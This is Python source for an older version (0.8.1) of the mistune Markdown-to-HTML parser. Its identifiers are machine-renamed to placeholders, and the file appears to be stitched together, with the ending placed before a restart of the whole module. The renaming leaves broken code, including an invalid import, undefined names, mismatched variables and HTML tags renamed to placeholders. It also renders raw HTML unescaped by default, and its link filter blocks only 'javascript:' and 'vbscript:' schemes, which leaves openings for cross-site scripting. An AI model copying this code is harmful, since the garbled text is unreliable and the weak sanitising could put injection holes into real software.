VAR_64 = '<%s%s>%s</%s>' % (VAR_82, VAR_93, VAR_14, VAR_82)
else:
VAR_64 = VAR_44.group(0)
return self.renderer.inline_html(VAR_64)
def FUNC_31(self, VAR_44):
VAR_13 = FUNC_1(VAR_44.group(1))
if VAR_13 not in self.footnotes:
return None
if self.footnotes[VAR_13]:
return None
self.footnote_index += 1
self.footnotes[VAR_13] = self.footnote_index
return self.renderer.footnote_ref(VAR_13, self.footnote_index)
def FUNC_32(self, VAR_44):
return self._process_link(VAR_44, VAR_44.group(3), VAR_44.group(4))
def FUNC_33(self, VAR_44):
VAR_13 = FUNC_1(VAR_44.group(2) or VAR_44.group(1))
if VAR_13 not in self.links:
return None
VAR_84 = self.links[VAR_13]
return self._process_link(VAR_44, VAR_84['link'], VAR_84['title'])
def FUNC_34(self, VAR_44):
VAR_13 = FUNC_1(VAR_44.group(1))
if VAR_13 not in self.links:
return None
VAR_84 = self.links[VAR_13]
return self._process_link(VAR_44, VAR_84['link'], VAR_84['title'])
def FUNC_35(self, VAR_44, VAR_49, VAR_62=None):
VAR_85 = VAR_44.group(0)
VAR_14 = VAR_44.group(1)
if VAR_85[0] == '!':
return self.renderer.image(VAR_49, VAR_62, VAR_14)
self._in_link = True
VAR_14 = self.output(VAR_14)
self._in_link = False
return self.renderer.link(VAR_49, VAR_62, VAR_14)
def FUNC_36(self, VAR_44):
VAR_14 = VAR_44.group(2) or VAR_44.group(1)
VAR_14 = self.output(VAR_14)
return self.renderer.double_emphasis(VAR_14)
def FUNC_37(self, VAR_44):
VAR_14 = VAR_44.group(2) or VAR_44.group(1)
VAR_14 = self.output(VAR_14)
return self.renderer.emphasis(VAR_14)
def FUNC_38(self, VAR_44):
VAR_14 = VAR_44.group(2)
return self.renderer.codespan(VAR_14)
def FUNC_39(self, VAR_44):
return self.renderer.linebreak()
def FUNC_40(self, VAR_44):
VAR_14 = self.output(VAR_44.group(1))
return self.renderer.strikethrough(VAR_14)
def FUNC_41(self, VAR_44):
VAR_14 = VAR_44.group(0)
return self.renderer.text(VAR_14)
class CLASS_4(object):
def __init__(self, **VAR_20):
self.options = VAR_20
def FUNC_42(self):
return ''
def VAR_26(self, VAR_54, VAR_63=None):
VAR_54 = code.rstrip('\n')
if not VAR_63:
VAR_54 = VAR_19(VAR_54, VAR_16=False)
return '<pre><VAR_54>%s\n</VAR_54></pre>\n' % VAR_54
VAR_54 = VAR_19(VAR_54, VAR_15=True, VAR_16=False)
return '<pre><VAR_54 class="lang-%s">%s\n</VAR_54></pre>\n' % (VAR_63, VAR_54)
def VAR_31(self, VAR_14):
return '<blockquote>%s\n</blockquote>\n' % VAR_14.rstrip('\n')
def VAR_36(self, VAR_64):
if self.options.get('skip_style') and \
VAR_64.lower().startswith('<style'):
return ''
if self.options.get('escape'):
return VAR_19(VAR_64)
return VAR_64
def VAR_69(self, VAR_14, VAR_65, VAR_66=None):
return '<h%d>%s</h%d>\n' % (VAR_65, VAR_14, VAR_65)
def VAR_28(self):
if self.options.get('use_xhtml'):
return '<hr />\n'
return '<hr>\n'
def FUNC_48(self, VAR_67, VAR_68=True):
VAR_82 = 'ul'
if VAR_68:
VAR_82 = 'ol'
return '<%s>\n%s</%s>\n' % (VAR_82, VAR_67, VAR_82)
def VAR_33(self, VAR_14):
return '<li>%s</li>\n' % VAR_14
def VAR_35(self, VAR_14):
return '<p>%s</p>\n' % VAR_14.strip(' ')
def VAR_37(self, VAR_69, VAR_67):
return (
'<VAR_37>\n<thead>%s</thead>\n'
'<tbody>\n%s</tbody>\n</VAR_37>\n'
) % (VAR_69, VAR_67)
def FUNC_52(self, VAR_70):
return '<tr>\n%s</tr>\n' % VAR_70
def FUNC_53(self, VAR_70, **VAR_71):
if VAR_71['header']:
VAR_82 = 'th'
else:
VAR_82 = 'td'
VAR_81 = VAR_71['align']
if not VAR_81:
return '<%s>%s</%s>\n' % (VAR_82, VAR_70, VAR_82)
return '<%s style="text-VAR_81:%s">%s</%s>\n' % (
VAR_82, VAR_81, VAR_70, VAR_82
)
def VAR_52(self, VAR_14):
return '<strong>%s</strong>' % VAR_14
def VAR_53(self, VAR_14):
return '<em>%s</em>' % VAR_14
def FUNC_56(self, VAR_14):
VAR_14 = VAR_19(VAR_14.rstrip(), VAR_16=False)
return '<VAR_54>%s</VAR_54>' % VAR_14
def VAR_55(self):
if self.options.get('use_xhtml'):
return '<br />\n'
return '<br>\n'
def VAR_56(self, VAR_14):
return '<del>%s</del>' % VAR_14
def VAR_14(self, VAR_14):
if self.options.get('parse_block_html'):
return VAR_14
return VAR_19(VAR_14)
def VAR_19(self, VAR_14):
return VAR_19(VAR_14)
def VAR_48(self, VAR_49, VAR_72=False):
VAR_14 = VAR_49 = FUNC_3(VAR_49)
if VAR_72:
VAR_49 = 'mailto:%s' % VAR_49
return '<a href="%s">%s</a>' % (VAR_49, VAR_14)
def VAR_49(self, VAR_49, VAR_62, VAR_14):
VAR_49 = FUNC_3(VAR_49)
if not VAR_62:
return '<a href="%s">%s</a>' % (VAR_49, VAR_14)
VAR_62 = VAR_19(VAR_62, VAR_15=True)
return '<a href="%s" VAR_62="%s">%s</a>' % (VAR_49, VAR_62, VAR_14)
def FUNC_62(self, VAR_73, VAR_62, VAR_14):
VAR_73 = FUNC_3(VAR_73)
VAR_14 = VAR_19(VAR_14, VAR_15=True)
if VAR_62:
VAR_62 = VAR_19(VAR_62, VAR_15=True)
VAR_64 = '<img VAR_73="%s" alt="%s" VAR_62="%s"' % (VAR_73, VAR_14, VAR_62)
else:
VAR_64 = '<img VAR_73="%s" alt="%s"' % (VAR_73, VAR_14)
if self.options.get('use_xhtml'):
return '%s />' % VAR_64
return '%s>' % VAR_64
def VAR_47(self, VAR_64):
if self.options.get('escape'):
return VAR_19(VAR_64)
return VAR_64
def VAR_25(self):
return ''
def FUNC_65(self, VAR_13, VAR_74):
VAR_64 = (
'<sup class="footnote-ref" id="fnref-%s">'
'<a href="#fn-%s">%d</a></sup>'
) % (VAR_19(VAR_13), VAR_19(VAR_13), VAR_74)
return VAR_64
def FUNC_66(self, VAR_13, VAR_14):
VAR_86 = (
'<a href="#fnref-%s" class="footnote">↩</a>'
) % VAR_19(VAR_13)
VAR_14 = VAR_14.rstrip()
if VAR_14.endswith('</p>'):
VAR_14 = re.sub(r'<\/p>$', r'%s</p>' % VAR_86, VAR_14)
else:
VAR_14 = '%s<p>%s</p>' % (VAR_14, VAR_86)
VAR_64 = '<li id="fn-%s">%s</li>\n' % (VAR_19(VAR_13), VAR_14)
return VAR_64
def VAR_61(self, VAR_14):
VAR_64 = '<div class="footnotes">\n%s<ol>%s</ol>\n</div>\n'
return VAR_64 % (self.hrule(), VAR_14)
class CLASS_5(object):
def __init__(self, VAR_59=None, VAR_75=None, VAR_76=None, **VAR_20):
if not VAR_59:
VAR_59 = CLASS_4(**VAR_20)
else:
VAR_20.update(VAR_59.options)
self.renderer = VAR_59
if VAR_75 and inspect.isclass(VAR_75):
VAR_75 = VAR_75(VAR_59, **VAR_20)
if VAR_76 and inspect.isclass(VAR_76):
VAR_76 = VAR_76(**VAR_20)
if VAR_75:
self.inline = VAR_75
else:
self.inline = CLASS_3(VAR_59, **VAR_20)
self.block = VAR_76 or CLASS_1(CLASS_0())
self.footnotes = []
self.tokens = []
self._parse_block_html = VAR_20.get('parse_block_html')
def __call__(self, VAR_14):
return self.parse(VAR_14)
def FUNC_68(self, VAR_14):
return self.parse(VAR_14)
def FUNC_6(self, VAR_14):
VAR_87 = self.output(FUNC_4(VAR_14))
VAR_88 = self.block.def_footnotes
self.block.def_links = {}
self.block.def_footnotes = {}
self.inline.links = {}
self.inline.footnotes = {}
if not self.footnotes:
return VAR_87
VAR_61 = filter(lambda o: VAR_88.get(o['key']), self.footnotes)
self.footnotes = sorted(
VAR_61, VAR_13=lambda o: VAR_88.get(o['key']), reverse=True
)
VAR_67 = self.renderer.placeholder()
while self.footnotes:
VAR_103 = self.footnotes.pop()
VAR_67 += self.renderer.footnote_item(
VAR_103['key'], VAR_103['text']
)
VAR_87 += self.renderer.footnotes(VAR_67)
return VAR_87
def FUNC_69(self):
if not self.tokens:
return None
self.token = self.tokens.pop()
return self.token
def FUNC_70(self):
if self.tokens:
return self.tokens[-1]
return None # pragma: no cover
def VAR_83(self, VAR_14, VAR_43=None):
self.tokens = self.block(VAR_14, VAR_43)
self.tokens.reverse()
self.inline.setup(self.block.def_links, self.block.def_footnotes)
VAR_87 = self.renderer.placeholder()
while self.pop():
VAR_87 += self.tok()
return VAR_87
def FUNC_71(self):
VAR_89 = self.token['type']
if VAR_89.endswith('_start'):
VAR_89 = t[:-6]
return getattr(self, 'output_%s' % VAR_89)()
def FUNC_72(self):
VAR_14 = self.token['text']
while self.peek()['type'] == 'text':
VAR_14 += '\n' + self.pop()['text']
return self.inline(VAR_14)
def FUNC_73(self):
return self.renderer.newline()
def FUNC_74(self):
return self.renderer.hrule()
def FUNC_75(self):
return self.renderer.header(
self.inline(self.token['text']),
self.token['level'],
self.token['text'],
)
def FUNC_38(self):
return self.renderer.block_code(
self.token['text'], self.token['lang']
)
def FUNC_76(self):
VAR_90 = self.token['align']
VAR_91 = len(VAR_90)
VAR_92 = self.renderer.placeholder()
VAR_69 = self.renderer.placeholder()
for VAR_101, value in enumerate(self.token['header']):
VAR_81 = VAR_90[VAR_101] if VAR_101 < VAR_91 else None
VAR_71 = {'header': True, 'align': VAR_81}
VAR_92 += self.renderer.table_cell(self.inline(value), **VAR_71)
VAR_69 += self.renderer.table_row(VAR_92)
VAR_67 = self.renderer.placeholder()
for VAR_101, row in enumerate(self.token['cells']):
VAR_92 = self.renderer.placeholder()
for j, value in enumerate(row):
VAR_81 = VAR_90[j] if j < VAR_91 else None
VAR_71 = {'header': False, 'align': VAR_81}
VAR_92 += self.renderer.table_cell(self.inline(value), **VAR_71)
VAR_67 += self.renderer.table_row(VAR_92)
return self.renderer.table(VAR_69, VAR_67)
def FUNC_77(self):
VAR_67 = self.renderer.placeholder()
while self.pop()['type'] != 'block_quote_end':
VAR_67 += self.tok()
return self.renderer.block_quote(VAR_67)
def FUNC_78(self):
VAR_68 = self.token['ordered']
VAR_67 = self.renderer.placeholder()
while self.pop()['type'] != 'list_end':
VAR_67 += self.tok()
return self.renderer.list(VAR_67, VAR_68)
def FUNC_79(self):
VAR_67 = self.renderer.placeholder()
while self.pop()['type'] != 'list_item_end':
if self.token['type'] == 'text':
VAR_67 += self.tok_text()
else:
VAR_67 += self.tok()
return self.renderer.list_item(VAR_67)
def FUNC_80(self):
VAR_67 = self.renderer.placeholder()
while self.pop()['type'] != 'list_item_end':
VAR_67 += self.tok()
return self.renderer.list_item(VAR_67)
def FUNC_31(self):
self.inline._in_footnote = True
VAR_67 = self.renderer.placeholder()
VAR_13 = self.token['key']
while self.pop()['type'] != 'footnote_end':
VAR_67 += self.tok()
self.footnotes.append({'key': VAR_13, 'text': VAR_67})
self.inline._in_footnote = False
return self.renderer.placeholder()
def FUNC_81(self):
VAR_14 = self.token['text']
return self.renderer.block_html(VAR_14)
def FUNC_82(self):
VAR_14 = self.token['text']
VAR_82 = self.token['tag']
if self._parse_block_html and VAR_82 not in VAR_7:
VAR_14 = self.inline(VAR_14, VAR_43=self.inline.inline_html_rules)
VAR_93 = self.token.get('extra') or ''
VAR_64 = '<%s%s>%s</%s>' % (VAR_82, VAR_93, VAR_14, VAR_82)
return self.renderer.block_html(VAR_64)
def FUNC_83(self):
return self.renderer.paragraph(self.inline(self.token['text']))
def FUNC_41(self):
return self.renderer.paragraph(self.tok_text())
def FUNC_5(VAR_14, VAR_19=True, **VAR_20):
return CLASS_5(VAR_19=FUNC_2, **VAR_20)(VAR_14)
|
import re
import .inspect
__version__ = '0.8.1'
__author__ = 'Hsiaoming Yang <me@lepture.com>'
__all__ = [
'BlockGrammar', 'BlockLexer',
'InlineGrammar', 'InlineLexer',
'Renderer', 'Markdown',
'markdown', 'escape',
]
VAR_0 = re.compile(r'\s+')
VAR_1 = re.compile(r'\W')
VAR_2 = re.compile(r'&(?!#?\w+;)')
VAR_3 = re.compile(r'\r\n|\r')
VAR_4 = re.compile(r'^ *> ?', VAR_71=re.M)
VAR_5 = re.compile(r'^ {4}', re.M)
VAR_6 = [
'a', 'em', 'strong', 'small', 's', 'cite', 'q', 'dfn', 'abbr', 'data',
'time', 'code', 'var', 'samp', 'kbd', 'sub', 'sup', 'i', 'b', 'u', 'mark',
'ruby', 'rt', 'rp', 'bdi', 'bdo', 'span', 'br', 'wbr', 'ins', 'del',
'img', 'font',
]
VAR_7 = ['pre', 'script', 'style']
VAR_8 = r'(?!:/|[^\w\s@]*@)\b'
VAR_9 = r'''\s*[a-zA-Z\-](?:\=(?:"[^"]*"|'[^']*'|[^\s'">]+))?'''
VAR_10 = r'(?!(?:%s)\b)\w+%s' % ('|'.join(VAR_6), VAR_8)
VAR_11 = ('javascript:', 'vbscript:')
def FUNC_0(VAR_12):
VAR_21 = VAR_12.pattern
if VAR_21.startswith('^'):
VAR_21 = pattern[1:]
return VAR_21
def FUNC_1(VAR_13):
VAR_13 = VAR_19(VAR_13.lower(), VAR_15=True)
return VAR_0.sub(' ', VAR_13)
def VAR_19(VAR_14, VAR_15=False, VAR_16=True):
if VAR_16:
VAR_14 = VAR_2.sub('&', VAR_14)
else:
VAR_14 = VAR_14.replace('&', '&')
VAR_14 = VAR_14.replace('<', '<')
VAR_14 = VAR_14.replace('>', '>')
if VAR_15:
VAR_14 = VAR_14.replace('"', '"')
VAR_14 = VAR_14.replace("'", ''')
return VAR_14
def FUNC_3(VAR_17):
VAR_22 = VAR_17.lower().strip('\x00\x1a \n\r\t')
for scheme in VAR_11:
if re.sub(r'[^A-Za-z0-9\/:]+', '', VAR_22).startswith(scheme):
return ''
return VAR_19(VAR_17, VAR_15=True, VAR_16=False)
def FUNC_4(VAR_14, VAR_18=4):
VAR_14 = VAR_3.sub('\n', VAR_14)
VAR_14 = VAR_14.expandtabs(VAR_18)
VAR_14 = VAR_14.replace('\u2424', '\n')
VAR_21 = re.compile(r'^ +$', re.M)
return VAR_21.sub('', VAR_14)
class CLASS_0(object):
VAR_23 = re.compile(
r'^ *\[([^^\]]+)\]: *' # [VAR_13]:
r'<?([^\s>]+)>?' # <VAR_49> or VAR_49
r'(?: +["(]([^\n]+)[")])? *(?:\n+|$)'
)
VAR_24 = re.compile(
r'^\[\^([^\]]+)\]: *('
r'[^\n]*(?:\n+|$)' # [^VAR_13]:
r'(?: {1,}[^\n]*(?:\n+|$))*'
r')'
)
VAR_25 = re.compile(r'^\n+')
VAR_26 = re.compile(r'^( {4}[^\n]+\n*)+')
VAR_27 = re.compile(
r'^ *(`{3,}|~{3,}) *(\S+)? *\n' # ```VAR_63
r'([\s\S]+?)\s*'
r'\1 *(?:\n+|$)' # ```
)
VAR_28 = re.compile(r'^ {0,3}[-*_](?: *[-*_]){2,} *(?:\n+|$)')
VAR_29 = re.compile(r'^ *(#{1,6}) *([^\n]+?) *#* *(?:\n+|$)')
VAR_30 = re.compile(r'^([^\n]+)\n *(=|-)+ *(?:\n+|$)')
VAR_31 = re.compile(r'^( *>[^\n]+(\n[^\n]+)*\n*)+')
VAR_32 = re.compile(
r'^( *)([*+-]|\d+\.) [\s\S]+?'
r'(?:'
r'\n+(?=\1?(?:[-*_] *){3,}(?:\n+|$))' # VAR_28
r'|\n+(?=%s)' # def VAR_60
r'|\n+(?=%s)' # def VAR_61
r'|\n{2,}'
r'(?! )'
r'(?!\1(?:[*+-]|\d+\.) )\n*'
r'|'
r'\s*$)' % (
FUNC_0(VAR_23),
FUNC_0(VAR_24),
)
)
VAR_33 = re.compile(
r'^(( *)(?:[*+-]|\d+\.) [^\n]*'
r'(?:\n(?!\2(?:[*+-]|\d+\.) )[^\n]*)*)',
VAR_71=re.M
)
VAR_34 = re.compile(r'^ *(?:[*+-]|\d+\.) +')
VAR_35 = re.compile(
r'^((?:[^\n]+\n?(?!'
r'%s|%s|%s|%s|%s|%s|%s|%s|%s'
r'))+)\n*' % (
FUNC_0(VAR_27).replace(r'\1', r'\2'),
FUNC_0(VAR_32).replace(r'\1', r'\3'),
FUNC_0(VAR_28),
FUNC_0(VAR_29),
FUNC_0(VAR_30),
FUNC_0(VAR_31),
FUNC_0(VAR_23),
FUNC_0(VAR_24),
'<' + VAR_10,
)
)
VAR_36 = re.compile(
r'^ *(?:%s|%s|%s) *(?:\n{2,}|\s*$)' % (
r'<!--[\s\S]*?-->',
r'<(%s)((?:%s)*?)>([\s\S]*?)<\/\1>' % (VAR_10, VAR_9),
r'<%s(?:%s)*?\s*\/?>' % (VAR_10, VAR_9),
)
)
VAR_37 = re.compile(
r'^ *\|(.+)\n *\|( *[-:]+[-| :]*)\n((?: *\|.*(?:\n|$))*)\n*'
)
VAR_38 = re.compile(
r'^ *(\S.*\|.*)\n *([-:]+ *\|[-| :]*)\n((?:.*\|.*(?:\n|$))*)\n*'
)
VAR_14 = re.compile(r'^[^\n]+')
class CLASS_1(object):
VAR_39 = CLASS_0
VAR_40 = [
'newline', 'hrule', 'block_code', 'fences', 'heading',
'nptable', 'lheading', 'block_quote',
'list_block', 'block_html', 'def_links',
'def_footnotes', 'table', 'paragraph', 'text'
]
VAR_41 = (
'newline', 'block_code', 'fences', 'lheading', 'hrule',
'block_quote', 'list_block', 'block_html', 'text',
)
VAR_42 = (
'newline', 'block_code', 'fences', 'heading',
'nptable', 'lheading', 'hrule', 'block_quote',
'list_block', 'block_html', 'table', 'paragraph', 'text'
)
def __init__(self, VAR_43=None, **VAR_20):
self.tokens = []
self.def_links = {}
self.def_footnotes = {}
if not VAR_43:
rules = self.grammar_class()
self.rules = VAR_43
def __call__(self, VAR_14, VAR_43=None):
return self.parse(VAR_14, VAR_43)
def FUNC_6(self, VAR_14, VAR_43=None):
VAR_14 = VAR_14.rstrip('\n')
if not VAR_43:
rules = self.default_rules
def FUNC_84(VAR_14):
for VAR_13 in VAR_43:
VAR_104 = getattr(self.rules, VAR_13)
VAR_44 = VAR_104.match(VAR_14)
if not VAR_44:
continue
getattr(self, 'parse_%s' % VAR_13)(VAR_44)
return VAR_44
return False # pragma: no cover
while VAR_14:
VAR_44 = FUNC_84(VAR_14)
if VAR_44 is not False:
VAR_14 = FUNC_59[len(VAR_44.group(0)):]
continue
if VAR_14: # pragma: no cover
raise RuntimeError('Infinite loop at: %s' % VAR_14)
return self.tokens
def FUNC_7(self, VAR_44):
VAR_77 = len(VAR_44.group(0))
if VAR_77 > 1:
self.tokens.append({'type': 'newline'})
def FUNC_8(self, VAR_44):
VAR_54 = VAR_5.sub('', VAR_44.group(0))
self.tokens.append({
'type': 'code',
'lang': None,
'text': VAR_54,
})
def FUNC_9(self, VAR_44):
self.tokens.append({
'type': 'code',
'lang': VAR_44.group(2),
'text': VAR_44.group(3),
})
def FUNC_10(self, VAR_44):
self.tokens.append({
'type': 'heading',
'level': len(VAR_44.group(1)),
'text': VAR_44.group(2),
})
def FUNC_11(self, VAR_44):
self.tokens.append({
'type': 'heading',
'level': 1 if VAR_44.group(2) == '=' else 2,
'text': VAR_44.group(1),
})
def FUNC_12(self, VAR_44):
self.tokens.append({'type': 'hrule'})
def FUNC_13(self, VAR_44):
VAR_46 = VAR_44.group(2)
self.tokens.append({
'type': 'list_start',
'ordered': '.' in VAR_46,
})
VAR_45 = VAR_44.group(0)
self._process_list_item(VAR_45, VAR_46)
self.tokens.append({'type': 'list_end'})
def FUNC_14(self, VAR_45, VAR_46):
VAR_45 = self.rules.list_item.findall(VAR_45)
VAR_78 = False
VAR_77 = len(VAR_45)
for VAR_101 in range(VAR_77):
VAR_79 = VAR_45[VAR_101][0]
VAR_94 = len(VAR_79)
VAR_79 = self.rules.list_bullet.sub('', VAR_79)
if '\n ' in VAR_79:
VAR_94 = VAR_94 - len(VAR_79)
VAR_21 = re.compile(r'^ {1,%d}' % VAR_94, VAR_71=re.M)
VAR_79 = VAR_21.sub('', VAR_79)
VAR_95 = VAR_78
if not VAR_95 and re.search(r'\n\n(?!\s*$)', VAR_79):
VAR_95 = True
VAR_96 = len(VAR_79)
if VAR_101 != VAR_77 - 1 and VAR_96:
VAR_78 = VAR_79[VAR_96-1] == '\n'
if not VAR_95:
VAR_95 = VAR_78
if VAR_95:
VAR_89 = 'loose_item_start'
else:
VAR_89 = 'list_item_start'
self.tokens.append({'type': VAR_89})
self.parse(VAR_79, self.list_rules)
self.tokens.append({'type': 'list_item_end'})
def FUNC_15(self, VAR_44):
self.tokens.append({'type': 'block_quote_start'})
VAR_45 = VAR_4.sub('', VAR_44.group(0))
self.parse(VAR_45)
self.tokens.append({'type': 'block_quote_end'})
def FUNC_16(self, VAR_44):
VAR_13 = FUNC_1(VAR_44.group(1))
self.def_links[VAR_13] = {
'link': VAR_44.group(2),
'title': VAR_44.group(3),
}
def FUNC_17(self, VAR_44):
VAR_13 = FUNC_1(VAR_44.group(1))
if VAR_13 in self.def_footnotes:
return
self.def_footnotes[VAR_13] = 0
self.tokens.append({
'type': 'footnote_start',
'key': VAR_13,
})
VAR_14 = VAR_44.group(2)
if '\n' in VAR_14:
VAR_97 = VAR_14.split('\n')
VAR_98 = None
for VAR_85 in VAR_97[1:]:
VAR_94 = len(VAR_85) - len(VAR_85.lstrip())
if VAR_94 and (not VAR_98 or VAR_94 < VAR_98):
VAR_98 = VAR_94
VAR_99 = [VAR_97[0]]
for VAR_85 in VAR_97[1:]:
VAR_99.append(VAR_85[VAR_98:])
VAR_14 = '\n'.join(VAR_99)
self.parse(VAR_14, self.footnote_rules)
self.tokens.append({
'type': 'footnote_end',
'key': VAR_13,
})
def FUNC_18(self, VAR_44):
VAR_79 = self._process_table(VAR_44)
VAR_80 = re.sub(r'(?: *\| *)?\n$', '', VAR_44.group(3))
VAR_80 = cells.split('\n')
for VAR_101, VAR_100 in enumerate(VAR_80):
VAR_100 = re.sub(r'^ *\| *| *\| *$', '', VAR_100)
VAR_80[VAR_101] = re.split(r' *\| *', VAR_100)
VAR_79['cells'] = VAR_80
self.tokens.append(VAR_79)
def FUNC_19(self, VAR_44):
VAR_79 = self._process_table(VAR_44)
VAR_80 = re.sub(r'\n$', '', VAR_44.group(3))
VAR_80 = cells.split('\n')
for VAR_101, VAR_100 in enumerate(VAR_80):
cells[VAR_101] = re.split(r' *\| *', VAR_100)
VAR_79['cells'] = VAR_80
self.tokens.append(VAR_79)
def FUNC_20(self, VAR_44):
VAR_69 = re.sub(r'^ *| *\| *$', '', VAR_44.group(1))
VAR_69 = re.split(r' *\| *', VAR_69)
VAR_81 = re.sub(r' *|\| *$', '', VAR_44.group(2))
VAR_81 = re.split(r' *\| *', VAR_81)
for VAR_101, VAR_100 in enumerate(VAR_81):
if re.search(r'^ *-+: *$', VAR_100):
VAR_81[VAR_101] = 'right'
elif re.search(r'^ *:-+: *$', VAR_100):
VAR_81[VAR_101] = 'center'
elif re.search(r'^ *:-+ *$', VAR_100):
VAR_81[VAR_101] = 'left'
else:
VAR_81[VAR_101] = None
VAR_79 = {
'type': 'table',
'header': VAR_69,
'align': VAR_81,
}
return VAR_79
def FUNC_21(self, VAR_44):
VAR_82 = VAR_44.group(1)
if not VAR_82:
VAR_14 = VAR_44.group(0)
self.tokens.append({
'type': 'close_html',
'text': VAR_14
})
else:
VAR_102 = VAR_44.group(2)
VAR_14 = VAR_44.group(3)
self.tokens.append({
'type': 'open_html',
'tag': VAR_82,
'extra': VAR_102,
'text': VAR_14
})
def FUNC_22(self, VAR_44):
VAR_14 = VAR_44.group(1).rstrip('\n')
self.tokens.append({'type': 'paragraph', 'text': VAR_14})
def FUNC_23(self, VAR_44):
VAR_14 = VAR_44.group(0)
self.tokens.append({'type': 'text', 'text': VAR_14})
class CLASS_2(object):
VAR_19 = re.compile(r'^\\([\\`*{}\[\]()#+\-.!_>~|])') # \* \+ \! ....
VAR_47 = re.compile(
r'^(?:%s|%s|%s)' % (
r'<!--[\s\S]*?-->',
r'<(\w+%s)((?:%s)*?)\s*>([\s\S]*?)<\/\1>' % (
VAR_8, VAR_9),
r'<\w+%s(?:%s)*?\s*\/?>' % (VAR_8, VAR_9),
)
)
VAR_48 = re.compile(r'^<([^ >]+(@|:)[^ >]+)>')
VAR_49 = re.compile(
r'^!?\[('
r'(?:\[[^^\]]*\]|[^\[\]]|\](?=[^\[]*\]))*'
r')\]\('
r'''\s*(<)?([\s\S]*?)(?(2)>)(?:\s+['"]([\s\S]*?)['"])?\s*'''
r'\)'
)
VAR_50 = re.compile(
r'^!?\[('
r'(?:\[[^^\]]*\]|[^\[\]]|\](?=[^\[]*\]))*'
r')\]\s*\[([^^\]]*)\]'
)
VAR_51 = re.compile(r'^!?\[((?:\[[^\]]*\]|[^\[\]])*)\]')
VAR_17 = re.compile(r'''^(https?:\/\/[^\s<]+[^<.,:;"')\]\s])''')
VAR_52 = re.compile(
r'^_{2}([\s\S]+?)_{2}(?!_)' # __word__
r'|'
r'^\*{2}([\s\S]+?)\*{2}(?!\*)' # **word**
)
VAR_53 = re.compile(
r'^\b_((?:__|[^_])+?)_\b' # _word_
r'|'
r'^\*((?:\*\*|[^\*])+?)\*(?!\*)' # *word*
)
VAR_54 = re.compile(r'^(`+)\s*([\s\S]*?[^`])\s*\1(?!`)') # `VAR_54`
VAR_55 = re.compile(r'^ {2,}\n(?!\s*$)')
VAR_56 = re.compile(r'^~~(?=\S)([\s\S]*?\S)~~') # ~~word~~
VAR_57 = re.compile(r'^\[\^([^\]]+)\]')
VAR_14 = re.compile(r'^[\s\S]+?(?=[\\<!\[_*`~]|https?://| {2,}\n|$)')
def FUNC_24(self):
self.linebreak = re.compile(r'^ *\n(?!\s*$)')
self.text = re.compile(
r'^[\s\S]+?(?=[\\<!\[_*`~]|https?://| *\n|$)'
)
class CLASS_3(object):
VAR_39 = CLASS_2
VAR_40 = [
'escape', 'inline_html', 'autolink', 'url',
'footnote', 'link', 'reflink', 'nolink',
'double_emphasis', 'emphasis', 'code',
'linebreak', 'strikethrough', 'text',
]
VAR_58 = [
'escape', 'autolink', 'url', 'link', 'reflink',
'nolink', 'double_emphasis', 'emphasis', 'code',
'linebreak', 'strikethrough', 'text',
]
def __init__(self, VAR_59, VAR_43=None, **VAR_20):
self.renderer = VAR_59
self.links = {}
self.footnotes = {}
self.footnote_index = 0
if not VAR_43:
rules = self.grammar_class()
VAR_20.update(self.renderer.options)
if VAR_20.get('hard_wrap'):
VAR_43.hard_wrap()
self.rules = VAR_43
self._in_link = False
self._in_footnote = False
self._parse_inline_html = VAR_20.get('parse_inline_html')
def __call__(self, VAR_14, VAR_43=None):
return self.output(VAR_14, VAR_43)
def FUNC_25(self, VAR_60, VAR_61):
self.footnote_index = 0
self.links = VAR_60 or {}
self.footnotes = VAR_61 or {}
def VAR_83(self, VAR_14, VAR_43=None):
VAR_14 = VAR_14.rstrip('\n')
if not VAR_43:
rules = FUNC_48(self.default_rules)
if self._in_footnote and 'footnote' in VAR_43:
rules.remove('footnote')
VAR_83 = self.renderer.placeholder()
def FUNC_84(VAR_14):
for VAR_13 in VAR_43:
VAR_21 = getattr(self.rules, VAR_13)
VAR_44 = VAR_21.match(VAR_14)
if not VAR_44:
continue
self.line_match = VAR_44
VAR_87 = getattr(self, 'output_%s' % VAR_13)(VAR_44)
if VAR_87 is not None:
return VAR_44, VAR_87
return False # pragma: no cover
while VAR_14:
VAR_84 = FUNC_84(VAR_14)
if VAR_84 is not False:
VAR_44, VAR_87 = VAR_84
VAR_83 += VAR_87
VAR_14 = FUNC_59[len(VAR_44.group(0)):]
continue
if VAR_14: # pragma: no cover
raise RuntimeError('Infinite loop at: %s' % VAR_14)
return VAR_83
def FUNC_27(self, VAR_44):
VAR_14 = VAR_44.group(1)
return self.renderer.escape(VAR_14)
def FUNC_28(self, VAR_44):
VAR_49 = VAR_44.group(1)
if VAR_44.group(2) == '@':
VAR_72 = True
else:
VAR_72 = False
return self.renderer.autolink(VAR_49, VAR_72)
def FUNC_29(self, VAR_44):
VAR_49 = VAR_44.group(1)
if self._in_link:
return self.renderer.text(VAR_49)
return self.renderer.autolink(VAR_49, False)
def FUNC_30(self, VAR_44):
VAR_82 = VAR_44.group(1)
if self._parse_inline_html and VAR_82 in VAR_6:
VAR_14 = VAR_44.group(3)
if VAR_82 == 'a':
self._in_link = True
VAR_14 = self.output(VAR_14, VAR_43=self.inline_html_rules)
self._in_link = False
else:
VAR_14 = self.output(VAR_14, VAR_43=self.inline_html_rules)
VAR_93 = VAR_44.group(2) or ''
VAR_64 = '<%s%s>%s</%s>' % (VAR_82, VAR_93, VAR_14, VAR_82)
else:
VAR_64 = VAR_44.group(0)
return self.renderer.inline_html(VAR_64)
def FUNC_31(self, VAR_44):
VAR_13 = FUNC_1(VAR_44.group(1))
if VAR_13 not in self.footnotes:
return None
if self.footnotes[VAR_13]:
return None
self.footnote_index += 1
self.footnotes[VAR_13] = self.footnote_index
return self.renderer.footnote_ref(VAR_13, self.footnote_index)
def FUNC_32(self, VAR_44):
return self._process_link(VAR_44, VAR_44.group(3), VAR_44.group(4))
def FUNC_33(self, VAR_44):
VAR_13 = FUNC_1(VAR_44.group(2) or VAR_44.group(1))
if VAR_13 not in self.links:
return None
VAR_84 = self.links[VAR_13]
return self._process_link(VAR_44, VAR_84['link'], VAR_84['title'])
def FUNC_34(self, VAR_44):
VAR_13 = FUNC_1(VAR_44.group(1))
if VAR_13 not in self.links:
return None
VAR_84 = self.links[VAR_13]
return self._process_link(VAR_44, VAR_84['link'], VAR_84['title'])
def FUNC_35(self, VAR_44, VAR_49, VAR_62=None):
VAR_85 = VAR_44.group(0)
VAR_14 = VAR_44.group(1)
if VAR_85[0] == '!':
